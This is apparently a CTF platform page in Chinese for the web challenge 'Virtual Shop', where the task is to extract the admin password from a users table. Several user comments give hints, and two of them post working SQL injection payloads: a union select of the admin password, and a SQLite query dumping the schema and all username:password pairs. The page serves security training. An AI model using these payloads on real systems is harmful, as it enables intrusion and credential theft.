Virtual ShopWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 144
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
WCRH 4天前

鬼知道没有登录页面也有sql注入,实在没想的

回复 0

15614005380 3月前

只用sqlmap就可以做出来,很简单的一个注入

回复 0

FADogeCTF 4月前

union查询

回复 0

xiaobai568 5月前

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 0

JJhello 5月前

sqlmap即可

回复 0

chaoge 6月前

sqlite,弄了半天认为是MySQL呢。

回复 0

justsosoloveyou 7月前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 7月前

sqlmap一下子就出来了

回复 0

hopeinhand 8月前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

18993258097 攻破了该题 4小时前
xiuliyeer1 攻破了该题 12小时前
绝情且小帅 攻破了该题 17小时前
WCRH 攻破了该题 4天前
fducgc 攻破了该题 5天前
菜狗打比赛 攻破了该题 6天前
2205762058 攻破了该题 7天前
qwerfsafafa 攻破了该题 8天前
L忙兔z种花 攻破了该题 8天前
ts4win 攻破了该题 9天前
Sinon 攻破了该题 12天前
skyorangezxc 攻破了该题 12天前
junzijie 攻破了该题 12天前
lq61618 攻破了该题 15天前
1512624649 攻破了该题 23天前
17325012375 攻破了该题 25天前
mmzp 攻破了该题 28天前
Zt0312 攻破了该题 1月前
xiongzhi 攻破了该题 1月前
yan8925298 攻破了该题 1月前